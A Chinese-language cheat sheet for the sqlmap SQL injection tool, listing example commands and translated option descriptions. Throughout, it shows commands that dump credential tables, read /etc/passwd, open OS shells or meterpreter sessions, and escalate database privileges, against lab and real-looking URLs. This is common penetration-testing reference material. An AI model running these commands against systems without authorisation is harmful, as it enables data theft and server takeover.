Sqlmap介绍及相关命令

sqlmap -u “http://www.vuln.cn/post.php?id=1”

sqlmap -u “http://www.vuln.cn/post.php?id=1”  –dbms mysql –level 3

sqlmap -u “http://www.baidu.com/shownews.asp” –cookie “id=11” –level 2（只有level达到2才会检测cookie）

sqlmap -r “c:\tools\request.txt” -p “username” –dbms mysql   指定username参数

sqlmap -u “http://www.vuln.cn/post.php?id=1”  –dbms mysql –level 3 –dbs

sqlmap -u “http://www.vuln.cn/post.php?id=1”  –dbms mysql –level 3 -D test –tables

sqlmap -u “http://www.vuln.cn/post.php?id=1”  –dbms mysql –level 3 -D test -T admin –columns

sqlmap -u “http://www.vuln.cn/post.php?id=1”  –dbms mysql –level 3 -D test -T admin -C “username,password” –dump

sqlmap -r “c:\tools\request.txt” –dbms mysql -D dedecms –search -C admin,password

python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --current-user

python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --current-db

python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -D security --tables

python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -D security -T users --columns

python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -D security -T users -C id --dump

python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --level 2

python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --dbms "Mysql"

python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --users

python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --dbs

python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --passwords

python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --passwords -U root

python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --privileges

python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --privileges -U root

python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --is-dba

python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --roles

sqlmap/sqlmap.py -u "http://url/news?id=1"   --udf-inject

python sqlmap/sqlmap.py -u "http://url/news?id=1"   --cookie "COOKIE_VALUE"

python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -b

python sqlmap/sqlmap.py -u "http://url/news?id=1" --data "id=3"

python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -f

python sqlmap/sqlmap.py -u "http://url/news?id=1"  --proxy"http://127.0.0.1:8118"

python sqlmap/sqlmap.py -u "http://url/news?id=1"--string"STRING_ON_TRUE_PAGE"

python sqlmap/sqlmap.py -u "http://url/news?id=1"   --file /etc/passwd

python sqlmap/sqlmap.py -u "http://url/news?id=1"   --os-shell

python sqlmap/sqlmap.py -u "http://url/news?id=1"   --os-pwn

python sqlmap/sqlmap.py -u "http://url/news?id=1"   --reg-read

python sqlmap/sqlmap.py -u "http://url/news?id=1"    --dbs-o "sqlmap.log"

python sqlmap/sqlmap.py -u "http://url/news?id=1"    --dbs  -o "sqlmap.log" --resume

–is-dba 当前用户权限（是否为root权限）
–dbs 所有数据库
–current-db 网站当前数据库
–users 所有数据库用户
–current-user 当前数据库用户
–random-agent 构造随机user-agent
–passwords 数据库密码
–proxy http://local:8080 –threads 10 (可以自定义线程加速) 代理
–time-sec=TIMESEC DBMS响应的延迟时间（默认为5秒）

-h, --help 显示基本帮助信息

-hh

显示高级帮助信息

--version 显示程序版本号

-v VERBOSE 赘言级别：0-6(默认 1)

目标：

-d DIRECT 直接连接到数据库

-u URL, --url=URL 目标 URL(e.g. "www.target.com/vuln.php?id=1")

-l LOGFILE 从 Burp 或 WebScarab 日志中解析目标

-m BULKFILE

在给定的文本文件中读取多个扫描目标

-g GOOGLEDORK 将 Google dork 结果作为目标 URL

-r REQUESTFILE 从文件中读取 HTTP 请求

-c CONFIGFILE 从 INI 配置文件中读取配置选项

sqlmap -u “http://url/news?id=1“ –dbs-o “sqlmap.log” 保存进度
sqlmap -u “http://url/news?id=1“ –dbs-o “sqlmap.log” –resume 恢复已保存进度

-d DIRECT 直接连接到数据库。
-u URL, –url=URL 目标URL。
-l LIST 从Burp或WebScarab代理的日志中解析目标。
-r REQUESTFILE 从一个文件中载入HTTP请求。
-g GOOGLEDORK 处理Google dork的结果作为目标URL。
-c CONFIGFILE 从INI配置文件中加载选项。

--data=DATA 通过 POST 方法提交的数据字符串--param-del=PDEL 用于分割参数值的字符
--cookie=COOKIE HTTP Cookie 头
--cookie-del=CDEL 用于分割 cookie 值的字符
--load-cookies=L.. 包含 cookies 的 Netscape/wget 格式文件
--drop-set-cookie 忽略响应中的 Set-Cookie 头
--user-agent=AGENT
HTTP User-Agent 头
--random-agent 使用随机选择的 HTTP User-Agent 头
--host=HOST HTTP Host 头
--referer=REFERER HTTP Referer 头
--headers=HEADERS Extra 头(e.g. "Accept-Language: fr\nETag: 123")
--auth-type=AUTH.. HTTP 认证方式(Basic, Digest, NTLM 或 PKI)
--auth-cred=AUTH.. HTTP 认证证书(name:password)
--auth-private=A.. HTTP 认证 PEM 私钥文件
--proxy=PROXY 使用代理连接目标 URL
--proxy-cred=PRO.. 代理认证证书(name:password)
--proxy-file=PRO.. 从文件读取代理列表
--ignore-proxy 接受系统默认代理设置
--tor 使用 Tor 匿名网络
--tor-port=TORPORT 设置默认以外的 Tor 代理端口
--tor-type=TORTYPE 设置 Tor 代理方式(HTTP(默认), SOCKS4 或
SOCKS5)
--check-tor 检查 Tor 是否正确使用--delay=DELAY 每个 HTTP 请求之间延迟的秒数
--timeout=TIMEOUT 认定连接超时的秒数(默认 30)
--retries=RETRIES 超时重试的次数(默认 3)
--randomize=RPARAM 随机改变给定参数的值
--safe-url=SAFURL 设置一个安全链接供系统经常访问
--safe-freq=SAFREQ 设置一个安全连接供系统在两次测试之间访问
--skip-urlencode 不对攻击载荷数据进行 URL 编码
--force-ssl

-a, --all 检索一切
-b, --banner 检索 DBMS banner 信息
--current-user 检索 DBMS 当前用户
--current-db 检索 DBMS 当前数据库
--hostname检索 DBMS 服务器主机名
--is-dba 检测当前用户是否是 DBA
--users枚举 DBMS 用户名
--passwords枚举 DBMS 用户密码哈希
--privileges 枚举 DBMS 用户权限
--roles枚举 DBMS 用户角色
--dbs 枚举 DBMS 数据库
--tables 枚举 DBMS 数据库表--columns 枚举 DBMS 数据库表字段
--schema 枚举 DBMS 架构
--count检索数据表中的条目数
--dump 转储 DBMS 数据库表中的条目
--dump-all 转储所有 DBMS 数据库表中的条目
--search 搜索字段名, 表名和(或)库名
--comments 检索 DBMS 注释
-D DB DBMS 数据库
-T TBL DBMS 数据库表
-C COL DBMS 数据库表字段
-X EXCLUDECOL 不枚举 DBMS 数据库表字段
-U USER DBMS 用户
--exclude-sysdbs 枚举数据库表时排除 DBMS 系统库
--where=DUMPWHERE 转储数据表时使用 WHERE 条件
--start=LIMITSTART 第一个查询的输出项检索
--stop=LIMITSTOP 最后一个查询的输出项检索
--first=FIRSTCHAR 第一个查询的输出字的字符检索
--last=LASTCHAR 最后一个查询的输出字的字符检索
--sql-query=QUERY 要执行的 SQL 语句
--sql-shell返回交互式的 SQL shell
--sql-file=SQLFILE 从给定的文件执行 SQL 语句强制暴破
--common-tables 检查是否存在常见表
--common-columns 检查是否存在常见字段

-o 开启所有优化开关

–predict-output 预测常见的查询输出

–keep-alive 使用持久的HTTP（S）连接

–null-connection 从没有实际的HTTP响应体中检索页面长度

–threads=THREADS 最大的HTTP（S）请求并发量（默认为1）

-p TESTPARAMETER 测试参数
--skip=SKIP跳过对给定参数的测试
--dbms=DBMS在这里强制指定后端 DBMS--dbms-cred=DBMS.. DBMS 认证证书(user:password)
--os=OS在这里强制后端 DBMS 操作系统
--invalid-bignum 使用大数字无效化值
--invalid-logical 使用逻辑运算无效化值
--invalid-string 使用随机字符串无效化值
--no-cast 关闭攻击载荷铸造机制
--no-escape 关闭字符串逃逸机制
--prefix=PREFIX 注入攻击载荷前缀字符串
--suffix=SUFFIX 注入攻击载荷后缀字符串
--tamper=TAMPER使用给定的脚本篡改注入数据

--level=LEVEL 执行测试的等级(1-5, 默认 1)
--risk=RISK 执行测试的风险(0-3, 默认 1)
--string=STRING 查询被评估为 True 时的匹配字符串
--not-string=NOT.. 查询被评估为 False 时的匹配字符串
--regexp=REGEXP 查询被评估为 True 时的正则表达式
--code=CODE 查询被评估为 True 时的 HTTP 代码
--text-only 仅基于文本内容比较网页
--titles 仅基于标题比较网页

--technique=TECH 使用的 SQL 注入技术(默认使用所有技术)--time-sec=TIMESEC DBMS 响应的延迟秒数(默认 5)
--union-cols=UCOLS UNION 查询注入测试字段的范围
--union-char=UCHAR 暴破字段数量使用的字符
--union-from=UFROM UNION 查询注入 FROM 部分使用的数据表
--dns-domain=DNS.. DNS 溢出攻击所使用的域名
--second-order=S.. 二阶响应页面 URL

-f, --fingerprint 执行检查广泛的DBMS版本指纹

--udf-inject 注入用户自定义函数

--shared-lib=SHLIB 共享库的本地路径

–common-tables 检查存在共同表

–common-columns 检查存在共同列

–udf-inject 注入用户自定义函数
 –shared-lib=SHLIB 共享库的本地路径

--hpp 使用 HTTP 参数污染

--eval=EVALCODE 供提交请求之前评估参数的 Python 代码(e.g.

"import hashlib;id2=hashlib.md5(id).hexdigest()")

–file-read=RFILE 从后端的数据库管理系统文件系统读取文件

–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件

–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径

–os-cmd=OSCMD 执行操作系统命令

–os-shell 交互式的操作系统的shell

–os-pwn 获取一个OOB shell，meterpreter或VNC

–os-smbrelay 一键获取一个OOB shell，meterpreter或VNC

–os-bof 存储过程缓冲区溢出利用

–priv-esc 数据库进程用户权限提升

–msf-path=MSFPATH Metasploit Framework本地的安装路径

–tmp-path=TMPPATH 远程临时文件目录的绝对路径

–reg-read 读一个Windows注册表项值

–reg-add 写一个Windows注册表项值数据

–reg-del 删除Windows注册表键值

–reg-key=REGKEY Windows注册表键

–reg-value=REGVAL Windows注册表项值

–reg-data=REGDATA Windows注册表键值数据

–reg-type=REGTYPE Windows注册表项值类型

-s SESSIONFILE 从存储(.sqlite)文件中读取会话
-t TRAFFICFILE 记录所有 HTTP 流量为一个文本文件
--batch
从不询问用户输入, 使用默认行为
--charset=CHARSET 强制数据检索使用的字符编码
--crawl=CRAWLDEPTH 从目标 URL 抓取起始网页
--csv-del=CSVDEL CSV 输出中使用的定界符(默认",")
--dump-format=DU.. 转储数据的格式(CSV(默认), 可以设置为 HTML
或 SQLITE)
--eta 显示每个输出的预计到达时间
--flush-session 刷新当前目标的会话文件
--forms
分析并测试目标 URL 中的表单
--fresh-queries 忽略在会话文件中存储的查询结果
--hex 对数据检索使用 DBMS 的 hex 函数
--output-dir=OUT.. 自定义输出目录路径--parse-errors 从响应中分析并显示 DBMS 错误消息
--pivot-column=P.. 透视字段
--save 保存选项到 INI 配置文件
--scope=SCOPE 用正则表达式从所提供的代理日志过滤目标
--test-filter=TE.. 通过攻击载荷和(或)标题选择测试(e.g. ROW)
--update 更新 sqlmap